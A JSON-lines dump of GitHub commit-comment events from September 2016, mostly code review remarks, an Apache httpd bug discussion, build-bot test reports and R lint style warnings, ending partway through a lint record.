{"id":"4599180279","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":19121439,"position":28,"line":18,"path":"addon/package.json","commit_id":"93793a2efddef17136b6a42c185c1b3fdcbfc0d5","created_at":"2016-09-21T21:53:10Z","updated_at":"2016-09-21T21:53:10Z","body":"Why bother webpacking this?  Easiest way to get babel working?"}},"created_at":"2016-09-21T21:53:10Z"}
{"id":"4599180927","type":"CommitCommentEvent","actor":{"login":"zjrunner"},"repo":{"name":"kkdawkins/vsts-tasks"},"payload":{"comment":{"id":19121443,"position":5,"line":66,"path":"Tasks/NuGetInstaller/nugetinstaller.ts","commit_id":"135ee49f1a5bac872871cb4292b2b78097aef17b","created_at":"2016-09-21T21:53:18Z","updated_at":"2016-09-21T21:53:18Z","body":"take this one out.  it is filePath type"}},"created_at":"2016-09-21T21:53:18Z"}
{"id":"4599195153","type":"CommitCommentEvent","actor":{"login":"jakubmisek"},"repo":{"name":"DEVSENSE/Parsers"},"payload":{"comment":{"id":19121482,"position":12,"line":749,"path":"Source/Devsense.PHP.Parser/Syntax/Generators/PhpLexer.lex","commit_id":"c0cb06bd54e1815b08f39036ab4298ae1e77612b","created_at":"2016-09-21T21:56:09Z","updated_at":"2016-09-21T21:56:09Z","body":"1. why ?\r\n2. do not call GetTokenString() twice, do not copy the whole string into char array just to check first char is '<', do not."}},"created_at":"2016-09-21T21:56:09Z"}
{"id":"4599195917","type":"CommitCommentEvent","actor":{"login":"alonpeer"},"repo":{"name":"DiUS/pact-jvm"},"payload":{"comment":{"id":19121483,"position":23,"line":23,"path":"CHANGELOG.md","commit_id":"a209a8cc6a47c37690c55c978f33655a0d754608","created_at":"2016-09-21T21:56:17Z","updated_at":"2016-09-21T21:56:17Z","body":"Oh ok, got it 😃 "}},"created_at":"2016-09-21T21:56:17Z"}
{"id":"4599200638","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19121488,"position":null,"line":null,"path":null,"commit_id":"a8467cf6ba0600b0b24045ed41accec1e09f87b8","created_at":"2016-09-21T21:57:15Z","updated_at":"2016-09-21T21:57:15Z","body":"👍 "}},"created_at":"2016-09-21T21:57:15Z"}
{"id":"4599204346","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19121494,"position":null,"line":null,"path":null,"commit_id":"a5924cf0aa5c7bc55146f3d9bc26212c3e0a87b5","created_at":"2016-09-21T21:58:02Z","updated_at":"2016-09-21T21:58:02Z","body":"Thanks.  I had already got up to `select /spi@60000100/sd@8` and testing `size`, `read`, `seek` and `write`.  Wasn't sure of the filesystem access method after that, as I still had the CForth SPIFFS words in mind.  I imagine a SPIFFS shim node will expose that layer higher up, without `disk-label`, similar to how `nandflash` works on XO-1."}},"created_at":"2016-09-21T21:58:02Z"}
{"id":"4599208984","type":"CommitCommentEvent","actor":{"login":"marc-invalid"},"repo":{"name":"marc-invalid/test"},"payload":{"comment":{"id":19121503,"position":null,"line":null,"path":null,"commit_id":"39df258b3ff634d3fa915d91a3254655cb2be4b5","created_at":"2016-09-21T21:58:54Z","updated_at":"2016-09-21T21:58:54Z","body":"comment 1\r\n"}},"created_at":"2016-09-21T21:58:54Z"}
{"id":"4599212554","type":"CommitCommentEvent","actor":{"login":"devzero84"},"repo":{"name":"apache/httpd"},"payload":{"comment":{"id":19121509,"position":null,"line":null,"path":null,"commit_id":"e841efed153646882e8adb14b4c71ac6e943329f","created_at":"2016-09-21T21:59:37Z","updated_at":"2016-09-21T21:59:37Z","body":"Hi,\r\n\r\nI'm using Apache 2.4.23 with mod_passenger (for redmine) which does not work anymore  (it did with Apache 2.2).\r\nError shown in error_log:\r\n`[Wed Sep 21 23:50:33.729215 2016] [autoindex:error] [pid 3533] [client 192.168.0.205:40690] AH01276: Cannot serve directory /var/lib/redmine/public/: No matching DirectoryIndex (index.html,index.html.var,index.php,index.phtml) found, and server-generated directory index forbidden by Options directive\r\n`\r\nWith disabled mod_autoindex (i.e. not loading) it is working as expected  and handled by mod_passenger.\r\n\r\nFor me it looks like an error in mod_autoindex so I've checked its history here at Github. **This commit breaks it**.\r\n\r\nUndoing this change and it is working with enabled mod_autoindex again.\r\nI've checked with mod_passenger 4.0.60 and 5.0.30. Both are not working with this commit."}},"created_at":"2016-09-21T21:59:37Z"}
{"id":"4599219691","type":"CommitCommentEvent","actor":{"login":"jakubmisek"},"repo":{"name":"DEVSENSE/Parsers"},"payload":{"comment":{"id":19121537,"position":123,"line":1096,"path":"Source/Devsense.PHP.Parser/Syntax/Names.cs","commit_id":"e090da4d782a4391278b98c1ea3fd35b757f08f3","created_at":"2016-09-21T22:00:59Z","updated_at":"2016-09-21T22:00:59Z","body":"note: it's also namespace alias, and default alias in PHP < 5.6"}},"created_at":"2016-09-21T22:00:59Z"}
{"id":"4599223073","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121543,"position":null,"line":null,"path":null,"commit_id":"f5187ab487a2800e3ad7e78d357847c3de345143","created_at":"2016-09-21T22:01:40Z","updated_at":"2016-09-21T22:01:40Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2370 of 2374 tests passed, 7 test warnings)\n\n * 6 tests had: EIO diffs.\n * 7 tests had: ESO small diffs.\n * 1 test had: AUD diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T22:01:40Z"}
{"id":"4599223075","type":"CommitCommentEvent","actor":{"login":"gravyboat"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19121544,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-21T22:01:41Z","updated_at":"2016-09-21T22:01:41Z","body":"Am I missing the PR? Or was this a push straight to master?"}},"created_at":"2016-09-21T22:01:41Z"}
{"id":"4599224531","type":"CommitCommentEvent","actor":{"login":"ZogStriP"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19121546,"position":13,"line":154,"path":"app/controllers/categories_controller.rb","commit_id":"641b95f655f0f653e3f0602d01729545ae8450ab","created_at":"2016-09-21T22:01:59Z","updated_at":"2016-09-21T22:01:59Z","body":"The thing is we want the images to use the CDN so this commit basically does the opposite of https://github.com/discourse/discourse/blob/master/app/serializers/basic_category_serializer.rb#L46"}},"created_at":"2016-09-21T22:01:59Z"}
{"id":"4599227693","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121553,"position":null,"line":null,"path":null,"commit_id":"97d4bf4587a4590db4273d5da9798afc6dbaaf0f","created_at":"2016-09-21T22:02:38Z","updated_at":"2016-09-21T22:02:38Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-MacOS-10.9-clang: OK (2332 of 2334 tests passed, 7 test warnings)\n\n * 4 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 7 tests had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T22:02:38Z"}
{"id":"4599228678","type":"CommitCommentEvent","actor":{"login":"HalosGhost"},"repo":{"name":"HalosGhost/pbpst"},"payload":{"comment":{"id":19121555,"position":null,"line":null,"path":null,"commit_id":"6e3cfb259e6472d68279109ac18ecd23c54e504c","created_at":"2016-09-21T22:02:50Z","updated_at":"2016-09-21T22:02:50Z","body":"The issue is that ``./configure`` tests for each command-line option individually, but ``-fsanitize=cfi`` requires the presence of ``-flto``, and I am not sure how to accommodate that for the moment.\r\n\r\nFor the record, as of this commit, ``pbpst`` still compiles and functions normally with the CFI sanitizer enabled; only the configure script fails."}},"created_at":"2016-09-21T22:02:50Z"}
{"id":"4599229395","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"khanfrd/android_kernel_xiaomi_kenzo"},"payload":{"comment":{"id":19121562,"position":5,"line":610,"path":"arch/arm64/mm/mmu.c","commit_id":"d9ded6702ac3e0f4be9928ffacb6f8d273db67ad","created_at":"2016-09-21T22:02:59Z","updated_at":"2016-09-21T22:02:59Z","body":"Mate, referring to this file: _arch/arm/include/asm/barrier.h_\r\n\r\n**dsb(ishst)** doesn't existed, but instead it was listed as **dmb(ishst)**\r\n\r\nSo I thing we should use **dsb(sy)** for a proper implementation."}},"created_at":"2016-09-21T22:02:59Z"}
{"id":"4599237419","type":"CommitCommentEvent","actor":{"login":"covener"},"repo":{"name":"apache/httpd"},"payload":{"comment":{"id":19121591,"position":null,"line":null,"path":null,"commit_id":"e841efed153646882e8adb14b4c71ac6e943329f","created_at":"2016-09-21T22:04:42Z","updated_at":"2016-09-21T22:04:42Z","body":"Looks like PR58498 in ASF bugzilla.  IIUC This module can't use \"\" as a handler and expect it to be honored.    I don't think we should revert the quoted revision after a year."}},"created_at":"2016-09-21T22:04:42Z"}
{"id":"4599238569","type":"CommitCommentEvent","actor":{"login":"georgehristov"},"repo":{"name":"Telaxus/EPESI"},"payload":{"comment":{"id":19121595,"position":108,"line":157,"path":"modules/Utils/QueryBuilder/QueryBuilder_0.php","commit_id":"954e193381162b929844c99316881d0ec9921adb","created_at":"2016-09-21T22:04:57Z","updated_at":"2016-09-21T22:04:57Z","body":"Before introducing this feature the `exportValue` method returned a json string which could be converted to suitable format (generally RB crits but also other).\r\nNow QueryBuilder is hardcoded linked to RB crits only.\r\nI was using the QueryBuilder to build different query than RB crits.\r\nAfter applying this feature it is not possible any more by using QB directly.\r\nIs it possible to consider returning the json for the `exportValue`?"}},"created_at":"2016-09-21T22:04:57Z"}
{"id":"4599239550","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121596,"position":null,"line":null,"path":null,"commit_id":"f5187ab487a2800e3ad7e78d357847c3de345143","created_at":"2016-09-21T22:05:12Z","updated_at":"2016-09-21T22:05:12Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T22:05:12Z"}
{"id":"4599240584","type":"CommitCommentEvent","actor":{"login":"theychx"},"repo":{"name":"theychx/catt"},"payload":{"comment":{"id":19121601,"position":null,"line":null,"path":null,"commit_id":"1b54fffe071f430ea0be6775fa0822646f3bf42a","created_at":"2016-09-21T22:05:25Z","updated_at":"2016-09-21T22:05:25Z","body":"Tested the gutted version of play_media for a couple of weeks without failure. As long as we are only using the \"Default Media Receiver\", I am pretty shure we don't need to kill anything."}},"created_at":"2016-09-21T22:05:25Z"}
{"id":"4599245102","type":"CommitCommentEvent","actor":{"login":"khanhhaduc"},"repo":{"name":"khanhhaduc/version-5"},"payload":{"comment":{"id":19121616,"position":null,"line":null,"path":null,"commit_id":"22913768b04ce9ffd4c7949867046b042fb761c9","created_at":"2016-09-21T22:06:22Z","updated_at":"2016-09-21T22:06:22Z","body":"not my forgetfulness. pls g"}},"created_at":"2016-09-21T22:06:22Z"}
{"id":"4599254692","type":"CommitCommentEvent","actor":{"login":"GalaticStryder"},"repo":{"name":"dorimanx/DORIMANX_LG_STOCK_LP_KERNEL"},"payload":{"comment":{"id":19121641,"position":null,"line":null,"path":null,"commit_id":"3c33ca0194e6d85938221519ea9b4d1dc426b058","created_at":"2016-09-21T22:08:09Z","updated_at":"2016-09-21T22:08:09Z","body":"Oh, my... thanks for the GCC upgrade and for the gapless exclusion, we already had the LG effects one. Now I understand the point of using stock and its blobs, all kernel effects are there to be used in userspace instead of generic HALs supplied by CAF."}},"created_at":"2016-09-21T22:08:09Z"}
{"id":"4599264468","type":"CommitCommentEvent","actor":{"login":"TomClark89"},"repo":{"name":"TomClark89/magicpics"},"payload":{"comment":{"id":19121660,"position":null,"line":null,"path":null,"commit_id":"8f5d228fecf3b9a925ce2310596daacb39e347a6","created_at":"2016-09-21T22:10:14Z","updated_at":"2016-09-21T22:10:14Z","body":"test"}},"created_at":"2016-09-21T22:10:14Z"}
{"id":"4599267193","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19121666,"position":14,"line":14,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T22:10:48Z","updated_at":"2016-09-21T22:10:48Z","body":"Correct. And for performance, we should recognize that lines 1-6 don't need to be processed beforehand (you don't need to worry about that part right now -- processing all the lines and taking the last 4 is fine).\r\n\r\nThe idea is that our GameState will have a buffer we keep on adding to, and eventually it'll overflow the window. In that case, we want to throw out the oldest text in the Window to make room for the new one. Eventually, the user should be able to scroll through the history as well, so all those lines are preserved in GameState."}},"created_at":"2016-09-21T22:10:48Z"}
{"id":"4599270393","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121678,"position":null,"line":null,"path":null,"commit_id":"5822760f472a91651701acce2fce3fa92fe6a3f5","created_at":"2016-09-21T22:11:33Z","updated_at":"2016-09-21T22:11:33Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-21T22:11:33Z"}
{"id":"4599273355","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121687,"position":null,"line":null,"path":null,"commit_id":"831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1","created_at":"2016-09-21T22:12:14Z","updated_at":"2016-09-21T22:12:14Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1765 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T22:12:14Z"}
{"id":"4599274280","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121692,"position":null,"line":null,"path":null,"commit_id":"5822760f472a91651701acce2fce3fa92fe6a3f5","created_at":"2016-09-21T22:12:26Z","updated_at":"2016-09-21T22:12:26Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T22:12:26Z"}
{"id":"4599276469","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19121699,"position":5,"line":5,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T22:12:58Z","updated_at":"2016-09-21T22:12:58Z","body":"The list method has `append()`, as you use later -- you could something like `temp.append([])`"}},"created_at":"2016-09-21T22:12:58Z"}
{"id":"4599276570","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19121700,"position":302,"line":1182,"path":"classes/install/Upgrade.inc.php","commit_id":"6d15d1508ef2fdacd73efe9e268068cf44b263e1","created_at":"2016-09-21T22:12:59Z","updated_at":"2016-09-21T22:12:59Z","body":"Fixed (also removed the above unset), thanks!"}},"created_at":"2016-09-21T22:12:59Z"}
{"id":"4599296535","type":"CommitCommentEvent","actor":{"login":"elvisciotti"},"repo":{"name":"ministryofjustice/opg-digi-deps-client"},"payload":{"comment":{"id":19121746,"position":null,"line":null,"path":null,"commit_id":"2df88672bc14e7299ff570031afb5adce8d849c6","created_at":"2016-09-21T22:17:34Z","updated_at":"2016-09-21T22:17:34Z","body":"@Biggsen looks good to me. You could run the tests on a branch with jenkins to double check it's all working\r\n@lauratennant happy with the case of the \"sign in\" ?"}},"created_at":"2016-09-21T22:17:34Z"}
{"id":"4599296926","type":"CommitCommentEvent","actor":{"login":"leaceliku"},"repo":{"name":"leaceliku/MyMap"},"payload":{"comment":{"id":19121748,"position":null,"line":null,"path":null,"commit_id":"c9943adb920301bf023a955c04a88eef0fa03d1e","created_at":"2016-09-21T22:17:40Z","updated_at":"2016-09-21T22:17:40Z","body":"[Lea_Celiku_Assignment1.pdf](https://github.com/leaceliku/MyMap/files/486132/Lea_Celiku_Assignment1.pdf)\r\n"}},"created_at":"2016-09-21T22:17:40Z"}
{"id":"4599309628","type":"CommitCommentEvent","actor":{"login":"yellowled"},"repo":{"name":"s9y/Serendipity"},"payload":{"comment":{"id":19121781,"position":null,"line":null,"path":null,"commit_id":"177044c9419870de61ef0a7a2651083b9355aaab","created_at":"2016-09-21T22:20:37Z","updated_at":"2016-09-21T22:20:37Z","body":"@onli See? It works. (Also removed the `index.tpl` for `idea`.)"}},"created_at":"2016-09-21T22:20:37Z"}
{"id":"4599316981","type":"CommitCommentEvent","actor":{"login":"scottbernstein"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19121799,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-21T22:22:15Z","updated_at":"2016-09-21T22:22:15Z","body":"Pushed straight to master.  Should I have followed a different protocol?\n\n________________________________\nFrom: Forrest <notifications@github.com>\nSent: Wednesday, September 21, 2016 6:01:41 PM\nTo: streamlink/streamlink\nSubject: Re: [streamlink/streamlink] Latest fix to plugin from livestreamer (b420f6c)\n\n\nAm I missing the PR? Or was this a push straight to master?\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/streamlink/streamlink/commit/b420f6c6ad093f6eded617c9bfb989f6316b1bd7#commitcomment-19121544>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AESJ1miv1_4xAOKWCMTBmJdsaibNcN8nks5qsalFgaJpZM4KDU5G>.\n"}},"created_at":"2016-09-21T22:22:15Z"}
{"id":"4599323515","type":"CommitCommentEvent","actor":{"login":"omgmakeme"},"repo":{"name":"jeffreychingchan/phase-0-tracks"},"payload":{"comment":{"id":19121821,"position":null,"line":null,"path":null,"commit_id":"21a644a8b4b136bc9b1b90e4b4d0208e62edb202","created_at":"2016-09-21T22:23:47Z","updated_at":"2016-09-21T22:23:47Z","body":":shipit: "}},"created_at":"2016-09-21T22:23:47Z"}
{"id":"4599327672","type":"CommitCommentEvent","actor":{"login":"omgmakeme"},"repo":{"name":"gemmabusoni/phase-0-tracks"},"payload":{"comment":{"id":19121831,"position":null,"line":null,"path":null,"commit_id":"0542e091c8fcec967e76c55ea2062fecd00892c0","created_at":"2016-09-21T22:24:46Z","updated_at":"2016-09-21T22:24:46Z","body":":shipit: "}},"created_at":"2016-09-21T22:24:46Z"}
{"id":"4599330161","type":"CommitCommentEvent","actor":{"login":"devzero84"},"repo":{"name":"apache/httpd"},"payload":{"comment":{"id":19121835,"position":null,"line":null,"path":null,"commit_id":"e841efed153646882e8adb14b4c71ac6e943329f","created_at":"2016-09-21T22:25:24Z","updated_at":"2016-09-21T22:25:24Z","body":"Thank you for your fast reply. You are right, it's that issue.\r\nIt was my fault, version 5.0.30 is working (4.0.60 not, but thats the point with the empty handler name).\r\nI saw your commit to passenger here on github. All ok ;)"}},"created_at":"2016-09-21T22:25:24Z"}
{"id":"4599331313","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19121837,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T22:25:41Z","updated_at":"2016-09-21T22:25:41Z","body":"develop (evanweaver) - Win64-Windows-7-VisualStudio-12: OK (2396 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.88%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T22:25:41Z"}
{"id":"4599331546","type":"CommitCommentEvent","actor":{"login":"omgmakeme"},"repo":{"name":"jeffreychingchan/phase-0-tracks"},"payload":{"comment":{"id":19121838,"position":null,"line":null,"path":null,"commit_id":"fb4d89abd81c6035522742f00fcf7a724237a1f6","created_at":"2016-09-21T22:25:44Z","updated_at":"2016-09-21T22:25:44Z","body":":shipit: "}},"created_at":"2016-09-21T22:25:44Z"}
{"id":"4599334504","type":"CommitCommentEvent","actor":{"login":"omgmakeme"},"repo":{"name":"polymer940c/phase-0-tracks"},"payload":{"comment":{"id":19121846,"position":null,"line":null,"path":null,"commit_id":"081e5756289e2f76a444268f7ab3e2a255b516ff","created_at":"2016-09-21T22:26:30Z","updated_at":"2016-09-21T22:26:30Z","body":":shipit: "}},"created_at":"2016-09-21T22:26:30Z"}
{"id":"4599337729","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19121860,"position":null,"line":null,"path":null,"commit_id":"be787afb92ca2f21f1696bb544ff777ef5eea46d","created_at":"2016-09-21T22:27:17Z","updated_at":"2016-09-21T22:27:17Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n^~~~~~~~~~~\n```\n[R/calcSumKDA2.R:1:27:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                          ^\n```\n[R/calcSumKDA2.R:1:29:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                            ^\n```\n[R/calcSumKDA2.R:1:31:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                              ^\n```\n[R/calcSumKDA2.R:1:37:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                                    ^\n```\n[R/calcSumKDA2.R:2:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/calcSumKDA2.R:3:11:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​  numbers = S:N;\n          ^\n```\n[R/calcSumKDA2.R:4:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​  s = length(I);\n    ^\n```\n[R/calcSumKDA2.R:5:11:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L5) *style:* **Use <-, not =, for assignment.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n          ^\n```\n[R/calcSumKDA2.R:5:22:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                     ^\n```\n[R/calcSumKDA2.R:5:26:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                        ~^~\n```\n[R/calcSumKDA2.R:5:29:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                            ^\n```\n[R/calcSumKDA2.R:5:33:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                               ~^~\n```\n[R/calcSumKDA2.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/calcSumKDA2.R:7:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:s) {\n     ^\n```\n[R/calcSumKDA2.R:8:14:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L8) *style:* **Use <-, not =, for assignment.**\n```r\n​    outcomes = KDA[numbers+1] + (log(I[i]) * numbers)  -\n             ^\n```\n[R/calcSumKDA2.R:8:27:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​    outcomes = KDA[numbers+1] + (log(I[i]) * numbers)  -\n                         